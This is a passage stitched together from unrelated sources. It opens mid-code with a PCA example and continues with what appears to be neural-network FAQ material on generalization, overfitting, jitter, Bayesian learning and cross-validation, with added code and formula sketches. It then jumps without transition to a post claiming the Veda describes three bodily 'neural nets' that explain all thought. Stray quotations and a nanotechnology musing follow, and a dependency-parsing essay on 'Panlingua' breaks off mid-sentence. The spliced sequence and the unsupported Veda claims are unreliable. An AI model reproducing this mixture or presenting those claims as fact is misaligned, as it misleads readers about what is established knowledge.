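Xc = X - X.mean(axis=0)                      # center the inputs first

_, s, Vt = np.linalg.svd(Xc, full_matrices=False)
pca_basis = Vt[:2].T                         # two leading principal components
random_basis, _ = np.linalg.qr(rng.normal(size=(5, 2)))

print("principal subspace:", subspace_error(Xc, pca_basis))
print("random subspace:   ", subspace_error(Xc, random_basis))
print("discarded variance:", float((s[2:] ** 2).sum()))
```

The error for the principal subspace equals the sum of the squared singular
values that were discarded, and no other two-dimensional subspace can do
better.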

During learning, the outputs of a supervised neural net come to approximate
the target values given the inputs in the training set. This ability may be
useful in itself, but more often the purpose of using a neural net is to
generalize--i.e., to have the outputs of the net approximate target values
given inputs that are not in the training set. Generalization is not always
possible, despite the blithe assertions of some authors. For example,
Caudill and Butler, 1990, p. 8, claim that "A neural network is able to
generalize", but they provide no justification for this claim, and they
completely neglect the complex issues involved in getting good
generalization.

There are three conditions that are typically necessary (although not
sufficient) for good generalization.

The first necessary condition is that the inputs to the network contain
sufficient information pertaining to the target, so that there exists a
mathematical function relating correct outputs to inputs with the desired
degree of accuracy. You can't expect a network to learn a nonexistent
function--neural nets are not clairvoyant! For example, if you want to
forecast the price of a stock, a historical record of the stock's prices is
rarely sufficient input; you need detailed information on the financial
state of the company as well as general economic conditions, and to avoid
nasty surprises, you should also include inputs that can accurately predict
wars in the Middle East and earthquakes in Japan. Finding good inputs for a
net and collecting enough training data often take far more time and effort
than training the network.

The second necessary condition is that the function you are trying to learn
(that relates inputs to correct outputs) be, in some sense, smooth. In other
words, a small change in the inputs should, most of the time, produce a
small change in the outputs. For continuous inputs and targets, smoothness
of the function implies continuity and restrictions on the first derivative
over most of the input space. Some neural nets can learn discontinuities as
long as the function consists of a finite number of continuous pieces. Very
nonsmooth functions such as those produced by pseudo-random number
generators and encryption algorithms cannot be generalized by neural nets.
Often a nonlinear transformation of the input space can increase the
smoothness of the function and improve generalization.

For classification, if you do not need to estimate posterior probabilities,
then smoothness is not theoretically necessary. In particular, feedforward
networks with one hidden layer trained by minimizing the error rate (a very
tedious training method) are universally consistent classifiers if the
number of hidden units grows at a suitable rate relative to the number of
training cases (Devroye, Györfi, and Lugosi, 1996). However, you are
likely to get better generalization with realistic sample sizes if the
classification boundaries are smoother.

For Boolean functions, the concept of smoothness is more elusive. It seems
intuitively clear that a Boolean network with a small number of hidden units
and small weights will compute a "smoother" input-output function than a
network with many hidden units and large weights. If you know a good
reference characterizing Boolean functions for which good generalization is
possible, please inform the FAQ maintainer (sas...@unx.sas.com).

The third necessary condition for good generalization is that the training
cases be a sufficiently large and representative subset ("sample" in
statistical terminology) of the set of all cases that you want to generalize
to (the "population" in statistical terminology). The importance of this
condition is related to the fact that there are, loosely speaking, two
different types of generalization: interpolation and extrapolation.
Interpolation applies to cases that are more or less surrounded by nearby
training cases; everything else is extrapolation. In particular, cases that
are outside the range of the training data require extrapolation. Cases
inside large "holes" in the training data may also effectively require
extrapolation. Interpolation can often be done reliably, but extrapolation
is notoriously unreliable. Hence it is important to have sufficient training
data to avoid the need for extrapolation. Methods for selecting good
training sets are discussed in numerous statistical textbooks on sample
surveys and experimental design.

Thus, for an input-output function that is smooth, if you have a test case
that is close to some training cases, the correct output for the test case
will be close to the correct outputs for those training cases. If you have
an adequate sample for your training set, every case in the population will
be close to a sufficient number of training cases. Hence, under these
conditions and with proper training, a neural net will be able to generalize
reliably to the population.

If you have more information about the function, e.g. that the outputs
should be linearly related to the inputs, you can often take advantage of
this information by placing constraints on the network or by fitting a more
specific model, such as a linear model, to improve generalization.
Extrapolation is much more reliable in linear models than in flexible
nonlinear models, although still not nearly as safe as interpolation. You
can also use such information to choose the training cases more efficiently.
For example, with a linear model, you should choose training cases at the
outer limits of the input space instead of evenly distributing them
throughout the input space.
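
The advice about the outer limits can be read off the textbook variance of
a fitted slope. As a sketch only, assume a simple linear regression
y_i = a + b x_i + e_i with independent errors of constant variance sigma^2
(the symbols a, b, e_i and sigma are introduced here for illustration and
do not appear in the text above):

```latex
\[
  \operatorname{Var}(\hat{b})
    = \frac{\sigma^2}{\sum_{i=1}^{n} (x_i - \bar{x})^2}
\]
```

The denominator is largest when the x_i sit as far from their mean as the
input space allows, so under these assumptions cases placed at the
extremes give the most precise slope estimate for a fixed number of
training cases.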

Noise in the actual data is never a good thing, since it limits the accuracy
of generalization that can be achieved no matter how extensive the training
set is. On the other hand, injecting artificial noise (jitter) into the
inputs during training is one of several ways to improve generalization for
smooth functions when you have a small training set.

If you have noise in the target values, the mean squared generalization
error can never be less than the variance of the noise, no matter how much
training data you have. But you can estimate the mean of the target
values, conditional on a given set of input values, to any desired degree of
accuracy by obtaining a sufficiently large and representative training set,
assuming that the function you are trying to learn is one that can indeed be
learned by the type of net you are using, and assuming that the complexity
of the network is regulated appropriately (White 1990).
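
The noise floor described above can be written as a short decomposition.
This is a sketch under assumptions that the text does not spell out: the
target is y = m(x) + e, where m(x) is the conditional mean of the target,
the noise e has mean zero given x and constant variance sigma^2, and f is
the function computed by the trained net. The symbols m, e, f and sigma
are introduced here for illustration.

```latex
\begin{align*}
E\big[(y - f(x))^2\big]
  &= E\big[(m(x) - f(x))^2\big]
     + 2\,E\big[(m(x) - f(x))\,e\big]
     + E\big[e^2\big] \\
  &= E\big[(m(x) - f(x))^2\big] + \sigma^2
  \;\ge\; \sigma^2 .
\end{align*}
```

The cross term vanishes because e has mean zero given x. More training
data can shrink the first term, which measures how far the net is from
the conditional mean, but it cannot touch sigma^2.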

The critical issue in developing a neural network is generalization: how
well will the network make predictions for cases that are not in the
training set? NNs, like other flexible nonlinear estimation methods such as
kernel regression and smoothing splines, can suffer from either underfitting
or overfitting. A network that is not sufficiently complex can fail to
detect fully the signal in a complicated data set, leading to underfitting.
A network that is too complex may fit the noise, not just the signal,
leading to overfitting. Overfitting is especially dangerous because it can
easily lead to predictions that are far beyond the range of the training
data with many of the common types of NNs. Overfitting can also produce wild
predictions in multilayer perceptrons even with noise-free data.

The best way to avoid overfitting is to use lots of training data. If you
have at least 30 times as many training cases as there are weights in the
network, you are unlikely to suffer from much overfitting, although you can
get some slight overfitting no matter how large the training set is. For
noise-free data, 5 times as many training cases as weights may be
sufficient. But you can't arbitrarily reduce the number of weights for fear
of underfitting.
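
To apply these rules of thumb you need the number of weights in the net.
The following is a minimal sketch, assuming a fully connected feedforward
net with one bias per hidden and output unit; the function names are
made up for this illustration.

```python
def count_mlp_weights(layer_sizes):
    """Count weights in a fully connected MLP, including one bias per
    hidden and output unit. layer_sizes lists the units per layer,
    input layer first."""
    return sum((n_in + 1) * n_out
               for n_in, n_out in zip(layer_sizes, layer_sizes[1:]))


def cases_per_weight(n_training_cases, layer_sizes):
    """Ratio of training cases to weights, for comparison with the
    rough thresholds of 30 (noisy data) and 5 (noise-free data)."""
    return n_training_cases / count_mlp_weights(layer_sizes)


# 10 inputs, 5 hidden units, 1 output: (10 + 1) * 5 + (5 + 1) * 1 = 61
n_weights = count_mlp_weights([10, 5, 1])
ratio = cases_per_weight(1830, [10, 5, 1])
```

With 61 weights, the 30-to-1 guideline asks for about 1830 training
cases.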

The complexity of a network is related to both the number of weights and the
size of the weights. Model selection is concerned with the number of
weights, and hence the number of hidden units and layers. The more weights
there are, relative to the number of training cases, the more overfitting
amplifies noise in the targets (Moody 1992). The other approaches listed
above are concerned, directly or indirectly, with the size of the weights.
Reducing the size of the weights reduces the "effective" number of
weights--see Moody (1992) regarding weight decay and Weigend (1994)
regarding early stopping. Bartlett (1997) obtained learning-theory results
in which generalization error is related to the L_1 norm of the weights
instead of the VC dimension.

Training with jitter works because the functions that we want NNs to learn
are mostly smooth. NNs can learn functions with discontinuities, but the
functions must be piecewise continuous in a finite number of regions if our
network is restricted to a finite number of hidden units.

In other words, if we have two cases with similar inputs, the desired
outputs will usually be similar. That means we can take any training case
and generate new training cases by adding small amounts of jitter to the
inputs. As long as the amount of jitter is sufficiently small, we can assume
that the desired output will not change enough to be of any consequence, so
we can just use the same target value. The more training cases, the merrier,
so this looks like a convenient way to improve training. But too much jitter
will obviously produce garbage, while too little jitter will have little
effect (Koistinen and Holmström 1992).
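
Generating jittered cases takes only a few lines. This is a minimal
sketch, assuming Gaussian jitter with the same standard deviation on
every input; the function name and the `copies`, `sigma` and `seed`
parameters are inventions for this example, and a good value of `sigma`
has to be found for each problem.

```python
import random


def jitter_cases(inputs, targets, copies, sigma, seed=0):
    """Return `copies` jittered versions of every training case.

    Each jittered input is the original input plus Gaussian noise with
    standard deviation `sigma`; the target is reused unchanged.
    """
    rng = random.Random(seed)
    new_inputs, new_targets = [], []
    for x, y in zip(inputs, targets):
        for _ in range(copies):
            new_inputs.append([xi + rng.gauss(0.0, sigma) for xi in x])
            new_targets.append(y)
    return new_inputs, new_targets


jittered_x, jittered_y = jitter_cases(
    [[0.0, 1.0], [2.0, 3.0]], [0, 1], copies=3, sigma=0.01)
```

The function returns only the jittered copies; whether to train on them
alone or together with the original cases is left to the caller.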

Consider any point in the input space, not necessarily one of the original
training cases. That point could possibly arise as a jittered input as a
result of jittering any of several of the original neighboring training
cases. The average target value at the given input point will be a weighted
average of the target values of the original training cases. For an infinite
number of jittered cases, the weights will be proportional to the
probability densities of the jitter distribution, located at the original
training cases and evaluated at the given input point. Thus the average
target values given an infinite number of jittered cases will, by
definition, be the Nadaraya-Watson kernel regression estimator using the
jitter density as the kernel. Hence, training with jitter is an
approximation to training with the kernel regression estimator as target.
Choosing the amount (variance) of jitter is equivalent to choosing the
bandwidth of the kernel regression estimator (Scott 1992).
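
For a single input variable the estimator described above can be
computed directly. This is a minimal sketch, assuming Gaussian jitter, so
that the kernel is a Gaussian density whose standard deviation plays the
role of the bandwidth; the function and parameter names are chosen for
this illustration.

```python
import math


def nadaraya_watson(x, train_x, train_y, bandwidth):
    """Nadaraya-Watson estimate at x: a weighted average of the training
    targets, weighted by a Gaussian kernel centred on each training
    input. The kernel's normalising constant cancels in the ratio."""
    weights = [math.exp(-0.5 * ((x - xi) / bandwidth) ** 2)
               for xi in train_x]
    total = sum(weights)
    return sum(w * y for w, y in zip(weights, train_y)) / total


# Halfway between two training cases, both get equal weight.
midpoint_estimate = nadaraya_watson(0.5, [0.0, 1.0], [0.0, 2.0], 0.5)
```

A large bandwidth (much jitter) pulls every estimate toward the overall
mean of the targets, and a small one reproduces the nearest training
target. Far from all training cases the weights can underflow to zero, a
case this sketch does not guard against.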

Conventional training methods for multilayer perceptrons ("backprop" nets)
can be interpreted in statistical terms as variations on maximum likelihood
estimation. The idea is to find a single set of weights for the network that
maximize the fit to the training data, perhaps modified by some sort of
weight penalty to prevent overfitting.

The Bayesian school of statistics is based on a different view of what it
means to learn from data, in which probability is used to represent
uncertainty about the relationship being learned (a use that is shunned in
conventional--i.e., frequentist--statistics). Before we have seen any data,
our prior opinions about what the true relationship might be can be
expressed in a probability distribution over the network weights that
define this relationship. After we look at the data (or after our program
looks at the data), our revised opinions are captured by a posterior
distribution over network weights. Network weights that seemed plausible
before, but which don't match the data very well, will now be seen as being
much less likely, while the probability for values of the weights that do
fit the data well will have increased.

Typically, the purpose of training is to make predictions for future cases
in which only the inputs to the network are known. The result of
conventional network training is a single set of weights that can be used to
make such predictions. In contrast, the result of Bayesian training is a
posterior distribution over network weights. If the inputs of the network
are set to the values for some new case, the posterior distribution over
network weights will give rise to a distribution over the outputs of the
network, which is known as the predictive distribution for this new case. If
a single-valued prediction is needed, one might use the mean of the
predictive distribution, but the full predictive distribution also tells you
how uncertain this prediction is.
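
Given a set of weight vectors drawn from the posterior, the predictive
distribution for a new case can be approximated by running the net once
per sample. This is a minimal sketch that assumes such samples are
already available (for example from MCMC) and uses a hypothetical net
with a single tanh hidden unit; none of the names below come from any
particular package.

```python
import math
import statistics


def predict(weights, x):
    """Hypothetical tiny net: one tanh hidden unit and a linear output."""
    w_in, b_in, w_out, b_out = weights
    return w_out * math.tanh(w_in * x + b_in) + b_out


def predictive_summary(weight_samples, x):
    """Mean and standard deviation of the net output at input x over a
    collection of posterior weight samples."""
    outputs = [predict(w, x) for w in weight_samples]
    return statistics.mean(outputs), statistics.pstdev(outputs)


# Two made-up posterior samples that disagree about the output weight.
samples = [(1.0, 0.0, 1.0, 0.0), (1.0, 0.0, 3.0, 0.0)]
mean, spread = predictive_summary(samples, 1.0)
```

The mean serves as the single-valued prediction and the spread indicates
how much the plausible weight settings disagree about this case.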

Selection of an appropriate network architecture is another place where
prior knowledge plays a role. One approach is to use a very general
architecture, with lots of hidden units, maybe in several layers or groups,
controlled using hyperparameters. This approach is emphasized by Neal
(1996), who argues that there is no statistical need to limit the complexity
of the network architecture when using well-designed Bayesian methods. It is
also possible to choose between architectures in a Bayesian fashion, using
the "evidence" for an architecture, as discussed by MacKay (1992a, 1992b).

Implementing all this is one of the biggest problems with Bayesian methods.
Dealing with a distribution over weights (and perhaps hyperparameters) is
not as simple as finding a single "best" value for the weights. Exact
analytical methods for models as complex as neural networks are out of the
question.

Bayesian purists may argue over the proper way to do a Bayesian analysis,
but even the crudest Bayesian computation (maximizing over both parameters
and hyperparameters) is shown by Sarle (1995) to generalize better than
early stopping when learning nonlinear functions. This approach requires the
use of slightly informative hyperpriors and at least twice as many training
cases as weights in the network. A full Bayesian analysis by MCMC can be
expected to work even better under even broader conditions. Bayesian
learning works well by frequentist standards--what MacKay calls the
"evidence framework" is used by frequentist statisticians under the name
"empirical Bayes." Although considerable research remains to be done,
Bayesian learning seems to be the most promising approach to training neural
networks.

Bayesian learning should not be confused with the "Bayes classifier." In the
latter, the distribution of the inputs given the target class is assumed to
be known exactly, and the prior probabilities of the classes are assumed
known, so that the posterior probabilities can be computed by a
(theoretically) simple application of Bayes' theorem. The Bayes classifier
involves no learning--you must already know everything that needs to be
known! The Bayes classifier is a gold standard that can almost never be used
in real life but is useful in theoretical work and in simulation studies
that compare classification methods. The term "Bayes rule" is also used to
mean any classification rule that gives results identical to those of a
Bayes classifier.
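
In a simulation study, where the class distributions are known by
construction, the Bayes classifier amounts to a direct application of
Bayes' theorem. This is a minimal sketch, assuming two classes with
known normal densities on a single input; the class labels, means and
function names are invented for the example.

```python
import math


def normal_pdf(x, mean, sd):
    """Density of a normal distribution with the given mean and sd."""
    return (math.exp(-0.5 * ((x - mean) / sd) ** 2)
            / (sd * math.sqrt(2 * math.pi)))


def bayes_posteriors(x, priors, densities):
    """Posterior class probabilities from known priors and known
    class-conditional densities, by Bayes' theorem."""
    joint = {c: priors[c] * densities[c](x) for c in priors}
    total = sum(joint.values())
    return {c: j / total for c, j in joint.items()}


priors = {"a": 0.5, "b": 0.5}
densities = {
    "a": lambda x: normal_pdf(x, 0.0, 1.0),
    "b": lambda x: normal_pdf(x, 2.0, 1.0),
}
posteriors = bayes_posteriors(1.0, priors, densities)
```

At x = 1.0, halfway between the two class means, the posteriors are
equal. Nothing here is estimated from data, which is the sense in which
the Bayes classifier involves no learning.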

Bayesian learning also should not be confused with the "naive" or "idiot's"
Bayes classifier (Warner et al. 1961; Ripley, 1996), which assumes that the
inputs are conditionally independent given the target class. The naive Bayes
classifier is usually applied with categorical inputs, and the distribution
of each input is estimated by the proportions in the training set; hence the
naive Bayes classifier is a frequentist method.
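
With categorical inputs, the naive Bayes classifier reduces to counting.
This is a minimal sketch using raw training-set proportions with no
smoothing, so a value never seen with a class gives that class a score
of zero; the function names and the toy data are invented for the
example.

```python
from collections import Counter, defaultdict


def fit_naive_bayes(rows, labels):
    """Tabulate class counts and, for each class and input position,
    the counts of each categorical value."""
    class_counts = Counter(labels)
    value_counts = defaultdict(Counter)  # key: (class, input index)
    for row, label in zip(rows, labels):
        for i, value in enumerate(row):
            value_counts[(label, i)][value] += 1
    return class_counts, value_counts


def classify(row, class_counts, value_counts):
    """Pick the class maximising prior proportion times the product of
    per-input proportions (the conditional independence assumption)."""
    n = sum(class_counts.values())
    best_class, best_score = None, -1.0
    for c, count in class_counts.items():
        score = count / n
        for i, value in enumerate(row):
            score *= value_counts[(c, i)][value] / count
        if score > best_score:
            best_class, best_score = c, score
    return best_class


rows = [("sunny", "hot"), ("sunny", "mild"),
        ("rainy", "mild"), ("rainy", "cool")]
labels = ["no", "no", "yes", "yes"]
class_counts, value_counts = fit_naive_bayes(rows, labels)
```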

You may not need any hidden layers at all. Linear and generalized linear
models are useful in a wide variety of applications (McCullagh and Nelder
1989). And even if the function you want to learn is mildly nonlinear, you
may get better generalization with a simple linear model than with a
complicated nonlinear model if there is too little data or too much noise to
estimate the nonlinearities accurately.

In MLPs with any of a wide variety of continuous nonlinear hidden-layer
activation functions, one hidden layer with an arbitrarily large number of
units suffices for the "universal approximation" property (e.g., Hornik,
Stinchcombe and White 1989; Hornik 1993; for more references, see Bishop
1995, 130, and Ripley, 1996, 173-180). But there is no theory yet to tell
you how many hidden units are needed to approximate any given function.

Unfortunately, using two hidden layers exacerbates the problem of local
minima, and it is important to use lots of random initializations or other
methods for global optimization. Local minima with two hidden layers can
have extreme spikes or blades even when the number of weights is much
smaller than the number of training cases. One of the few advantages of
standard backprop is that it is so slow that spikes and blades will not
become very sharp for practical training times.

If you are using early stopping, it is essential to use lots of hidden units
to avoid bad local optima (Sarle 1995). There seems to be no upper limit on
the number of hidden units, other than that imposed by computer time and
memory requirements. Weigend (1994) makes this assertion, but provides only
one example as evidence. Tetko, Livingstone, and Luik (1995) provide
simulation studies that are more convincing. The FAQ maintainer obtained
similar results in conjunction with the simulations in Sarle (1995), but
those results are not reported in the paper for lack of space. On the other
hand, there seems to be no advantage to using more hidden units than you
have training cases, since bad local minima do not occur with so many hidden
units.

If you are using weight decay or Bayesian estimation, you can also use lots
of hidden units (Neal 1995). However, it is not strictly necessary to do so,
because other methods are available to avoid local minima, such as multiple
random starts and simulated annealing (such methods are not safe to use with
early stopping). You can use one network with lots of hidden units, or you
can try different networks with different numbers of hidden units, and
choose on the basis of estimated generalization error. With weight decay or
MAP Bayesian estimation, it is prudent to keep the number of weights less
than half the number of training cases.

Cross-validation and bootstrapping are both methods for estimating
generalization error based on "resampling" (Weiss and Kulikowski 1991; Efron
and Tibshirani 1993; Hjorth 1994; Plutowski, Sakata, and White 1994).

In k-fold cross-validation, you divide the data into k subsets of equal
size. You train the net k times, each time leaving out one of the subsets
from training, but using only the omitted subset to compute whatever error
criterion interests you. If k equals the sample size, this is called
"leave-one-out" cross-validation. A more elaborate and expensive version of
cross-validation involves leaving out all possible subsets of a given size.
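
The k-fold procedure can be sketched in a few lines. This is an
illustration only: it assumes the cases are already in random order,
lets fold sizes differ by at most one when k does not divide the sample
size, and takes the training routine and error criterion as
caller-supplied functions (`fit` and `error` are placeholder names).

```python
def k_fold_indices(n_cases, k):
    """Yield (train_indices, test_indices) for each of the k folds."""
    indices = list(range(n_cases))
    fold_sizes = [n_cases // k + (1 if i < n_cases % k else 0)
                  for i in range(k)]
    start = 0
    for size in fold_sizes:
        test = indices[start:start + size]
        train = indices[:start] + indices[start + size:]
        yield train, test
        start += size


def cross_validate(xs, ys, k, fit, error):
    """Average the error criterion over all cases, each one scored by a
    model trained without the fold that contains it."""
    total_error = 0.0
    for train, test in k_fold_indices(len(xs), k):
        model = fit([xs[i] for i in train], [ys[i] for i in train])
        total_error += sum(error(model, xs[i], ys[i]) for i in test)
    return total_error / len(xs)


def fit_mean(xs, ys):
    """Stand-in 'model': predict the mean training target."""
    return sum(ys) / len(ys)


def squared_error(model, x, y):
    return (model - y) ** 2


# k equal to the sample size gives leave-one-out cross-validation.
loo_error = cross_validate([0, 1, 2, 3], [1, 2, 3, 4], 4,
                           fit_mean, squared_error)
```

In practice `fit` would train a net and `error` would be whatever
criterion interests you; the mean predictor only keeps the example short.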

Note that cross-validation is quite different from the "split-sample" or
"hold-out" method that is commonly used for early stopping in NNs. In the
split-sample method, only a single subset (the validation set) is used to
estimate the error function, instead of k different subsets; i.e., there is
no "crossing". While various people have suggested that cross-validation be
applied to early stopping, the proper way of doing so is not obvious.

The distinction between cross-validation and split-sample validation is
extremely important because cross-validation is markedly superior for small
data sets; this fact is demonstrated dramatically by Goutte (1997) in a
reply to Zhu and Rohwer (1996). For an insightful discussion of the
limitations of cross-validatory choice among several learning methods, see
Stone (1977).

Leave-one-out cross-validation often works well for continuous error
functions such as the mean squared error, but it may perform poorly for
noncontinuous error functions such as the number of misclassified cases. In
the latter case, k-fold cross-validation is preferred. But if k gets too
small, the error estimate is pessimistically biased because of the
difference in sample size between the full-sample analysis and the
cross-validation analyses. A value of 10 for k is popular.

Leave-one-out cross-validation can also run into trouble with various
model-selection methods, such as choosing a subset of the inputs or choosing
the number of hidden units. The problem again is lack of continuity--a small
change in the data can cause a large change in the model selected (Breiman
1996). For choosing subsets of inputs in linear regression, Breiman and
Spector (1992) found 10-fold cross-validation to work better than
leave-one-out. Kohavi (1995) also obtained good results for 10-fold
cross-validation with empirical decision trees (C4.5). Shao (1993) shows
that for selecting subsets of inputs in a linear regression, the probability
of selecting the subset with the best predictive ability does not converge
to 1 (as the sample size n goes to infinity) for leave-v-out
cross-validation unless the proportion v/n approaches 1. But Shao's result
is not easy to reconcile with the analysis by Kearns (1997) of split-sample
validation.

Hindu religion is what 800 million people in one part of the world
follow. Hindu religion is based on Veda.

Veda is not a religion in any sense of the word. It is a topic of
inquiry only for a very small select group of scholars not exceeding a few
hundred thousand people at the best time in history when practice of that
subject was at its peak. It has been so for thousands of years.

According to Veda there are three kinds of "neural nets" in the body. One
set of them that makes up the spine is philosophically called the Unknown.
The second set that makes up the nervous systems in the regions of mouth,
neck, etc. is philosophically called the Known. The third set that makes up
the brain tissue is philosophically called the Desirable.

Now these three nets interact with each other, and even try to control
each other. When the Known is controlled by the Unknown it is called
Brhaspati in the Veda. When the Desirable is controlled by the Unknown it
is called Indra. (I am not willing to go beyond this in explaining any
more terms.) It can be proved that all human or animal faculties of
thought as well as other body functions including breathing can be
theoretically derived from the interaction of these three neural-nets:
namely the Known, the Desirable and the Unknown. There are specific
psychological feelings that get generated when each net participates in
this interaction in a particular way (It needs some personal observation
to verify this, but I suggest any one who wants to do that must consult
their doctor before attempting it, because my site or this post being
entirely for academic purpose does not offer any guarantees). The
possibility of interactions is infinite, and the subject of Veda is
infinite. The more one digs into it, the more one can find. I can not
further simplify the subject beyond this. Those who discuss Veda insist
on using their jargon as much as scholars of any other subject do.

One last word: Veda is not only meant for ai or neural-nets. It is meant
for discussing a number of other subjects ALL AT THE SAME TIME! This is
for the simple reason that all subjects originate from the interaction of
the Known, Unknown and Desirable. Ironically that is the reason why no
topic of inquiry likes to include Veda because Veda always appears to be
"off topic" for each of Veda's own component topics of inquiry, due to the
presence of other topics in it. This paradox has been haunting Veda for
centuries.

* * *

"We act as though comfort and luxury were the chief requirements
of life, when all that we need to make us happy is something
to be enthusiastic about." -- Albert Einstein

* * *

Nanotechnology has been hailed as the coming miracle of medicine and
technology. We should use it not as the destination of human evolution,
but as an educational tool for the further advancement of medicine. We
should not evolve to be dependent upon technology, but use it as an
educational tool to discover how to use the technology that already
exists within ourselves, our own computers, the human body. Instead,
nanotechnology has been misconstrued as the technology that will itself
be the end-all solution to mortality: immortality. Yes, this technology
will help us to cure diseases and usher in a whole new era of medicine.
However, there will be a fork in the road a few miles ahead. One
direction will be to use the technology to evolve with the help of
artificial machinery, so that the human species transforms and becomes
dependent upon it: a cyborg species. The other road will lead to learning
from this technology, and evolving biologically from the new knowledge
discovered.

I have yet many things to say unto you, but ye cannot bear them now. --Yeshuah.

Parsing takes on a new and more precise definition in a linguistic model
consisting entirely of links and nodes. Here, in a hackneyed sentence, is an
example of the kind of thing that must be done. It does not purport to define
the entire problem, but only enough of the problem to give an idea of what
must be done:

Fruit flies like a banana.

In this example I will use Interlinguish, which is my present best
computational version of Panlingua. The above sentence should parse to the
following Interlinguish representation:

The verb: to like.
The subject: fruit flies.
The object: a banana.

Or, more specifically:

atom ID | atoms in subtree | synlink type | lexlink type | English word
1       | 5                | present verb | ongoing      | like (stative verb)
2       | 2                | eng          | def          | fruit_flies (doer engaged in activity)
3       | 1                | adj          | def          | plural (plural marker atom)
4       | 2                | pat          | def          | banana (patient, default lexlink type)
5       | 1                | art          | def          | a (article, default lexlink type)
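
The "atoms in subtree" column is enough to recover which atom depends on
which, if one assumes that the rows are listed in preorder (each atom
immediately followed by all the atoms of its subtree). That reading is an
assumption, although the counts in the table are consistent with it. A
minimal sketch, with a function name made up for the purpose:

```python
def regents_from_subtree_sizes(sizes):
    """Given subtree sizes in preorder, return for each atom the 1-based
    ID of the atom it depends on (None for the root)."""
    regents = [None] * len(sizes)
    stack = []  # (atom index, last index covered by that atom's subtree)
    for i, size in enumerate(sizes):
        # Leave every subtree that ended before atom i.
        while stack and stack[-1][1] < i:
            stack.pop()
        if stack:
            regents[i] = stack[-1][0] + 1
        stack.append((i, i + size - 1))
    return regents


# Subtree sizes for atoms 1..5: like, fruit_flies, plural, banana, a.
regents = regents_from_subtree_sizes([5, 2, 1, 2, 1])
```

Under this reading, fruit_flies and banana both depend on like, the
plural marker depends on fruit_flies, and the article depends on banana.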

A synlink is a link to a regent word a la dependency grammar. A lexlink is a
link to a semantic node, or semnod. Each word in Panlingua has only one
synlink and only one lexlink, but before disambiguation many potential links
are present. Before parsing, the lexicon will provide the following potential
links for the original words of the sentence:

1. fruit:

As a singular noun:

This word has potential synlink types of act (doer initiating an activity in
which doer does not engage), eng (doer engaging in activity), and pat
(patient, or thing that takes the explicit state indicated by the verb). In
the English lexicon all these possible synlink types are summed up as just
"singular noun."

It has only one lexlink type, namely "default."

As a verb it has only "present tense verb" as a potential synlink type, and
"ongoing" as potential lexlink type.

2. flies:

As a plural noun: potential synlinks of type act, eng, and pat; and potential
lexlink of type "default."

As a present tense verb, it has "ongoing" as its only potential lexlink type.
Notice that it is of English verb class 3rd, which means that it must take a
third-person singular subject. This latter fact is not expressed by means of
potential link type, since in Panlingua there can be no synlink type of "third
person singular subject." It is an issue to be resolved by the ad hoc code of
the English parser.

In addition, the lexicon tells us that there is also an identifier for
fruit_flies, which functions as a plural noun, has the regular act, eng, and
pat potential synlink types and the default potential lexlink type.

3. like:

Verb, present, ongoing.
Preposition, behaves like stative verb with meaning roughly "emulating."

4. a:

Can only ever have one synlink type (article) and one lexlink type (default).

5. banana:

The ordinary singular noun synlinks. Lexlinks are of type "default." One
links to the semnod for the fruit, another links to the semnod that links also
to "penis."

Notice that the terminuses of the potential lexlinks are definite and
unambiguous. Each potential lexlink links the word to but one and only one
semnod (semantic node). The same is not true for the synlinks, whose
terminuses must somehow be resolved.

But in both cases one thing is definitely clear, and that is this: Because in
Panlingua each atom (word) must have one and only one synlink and one and only
one lexlink, the process of parsing is mainly a culling process in which only
the right links survive.

Thus in summary, the problem is to cull all spurious links and select the
right word as terminus for each synlink.

Recall that in dependency grammar a regent is a word upon which another word
"depends." The depending word is called the dependent. The terminus of each
synlink in Panlingua is either a regent or a sibling word. A sibling, in this
sense, is a co-dependent of the same regent word. The matter of the synlinks
is further complicated by the fact that the type of a synlink linking a word
to a sibling word is actually the type of the link to its regent.

Thus in a simple sentence like:

John loves Mary.

the Tinkertoy syntactic representation comes out like this:

loves
|
v
John->Mary.

Thus John links to loves through a synlink of type "eng," meaning that John
remains engaged in the action, and Mary is linked to John by a synlink of type
"pat," meaning that the explicit state indicated by the verb (loved) is
transferred to her (Mary is the thing that "gets loved").

As you may have noticed, the direction of the synlinks is also confusing, and
may require revision at some later date. In practise, however, direction of
synlink apparently has no particular relevance. It may later be proven to
indicate something like "state flow," but this remains to be worked out.
At any rate, besides the potential links for the example sentence I have
already described, there also exist many other links important to the process
of disambiguation, although the exact way in which they are to be used and
precisely what they all are remains something of a mystery. I will describe
the ones I think I know, and perhaps you can "see" others I have overlooked.

A part of the human linguistic apparatus that seems to be very important to
parsing is the ontology. Oh, yes, I suppose that first of all I should
actually posit the idea that such a thing indeed exists. It appears that part
of the human linguistic apparatus is something we call the ontology (Greek
ontos=be, logos=word, study). The ontology, as all other internal workings of
the human linguistic apparatus, is made up of links and nodes. The nodes are
called semnods (semantic nodes), and the links are called semlinks (semantic
links). So:

1. "Fruit" links to a semnod from which a semlink of type "is a part of" runs
to another semnod to which "plant" is linked by a lexlink. "Fruit" is also
linked to another semnod to which "bear" is also linked. From this it can be
seen that semnods are independent of part of speech, which is a syntactic
phenomenon.

Flies is linked to the same semnod linked to flying, as well as to the semnod
linked to fly as a noun. The semnod to which flying is linked is linked by a
semlink of type hypernym ("is a kind of") to a semnod linked to
"physical_activity." And the semnod linked to fly as a noun is linked by a
semlink of type hypernym to a semnod linked to flying_insect. I will leave it
as an intellectual exercise to the reader to work out the links for fly at the
front of the pants.

"Like" is one of those most difficult of all English words--namely the ones
that serve as prepositions. Even as a verb it is probably linked to more than
one semnod in the minds of most native speakers of the language. First of all
it is linked to a semnod also linked to "enjoy." Then it is linked to a
semnod linked to "relish." Then again it is probably linked in most people's
minds to a semnod also linked to a semnod associated with "feel friendship
for," etc. As a preposition it links to the same semnod as "as." As an
adjective it links to the same semnod as "similar." Etc.

I will not burden the reader by plowing on all the way through these semnods
and semlinks that belong to the ontology. I will simply conclude by saying
that it is difficult to determine precisely how these links are employed in
natural systems (human brains), but that computers can treat an ontology as a
kind of "black box" that can return information about how semnods are linked
to each other, and that this information constitutes knowledge about language
and the real world. There may be far better ways of employing these links and
nodes, but they remain undiscovered as far as we know at this time.

But using the "ontology is a black box" approach in systems like the one I
have been experimenting with requires yet another kind of device employing
links and nodes to provide complete information about language. This is
because the ontology cannot return information about more than two nodes and
the links between them at a time. Thus the ontology could tell the parser
that a fruit_fly is a kind of fruit eating insect, and that fruit flies can
fly, but it could not tell the parser that fruit flies like to eat bananas.
This would require the trinary relation fruit_fly->like_to_eat->banana,
whereas the ontology is only capable of dealing with two semnods at a time,
for example the information that fruit flies can eat or that bananas can be
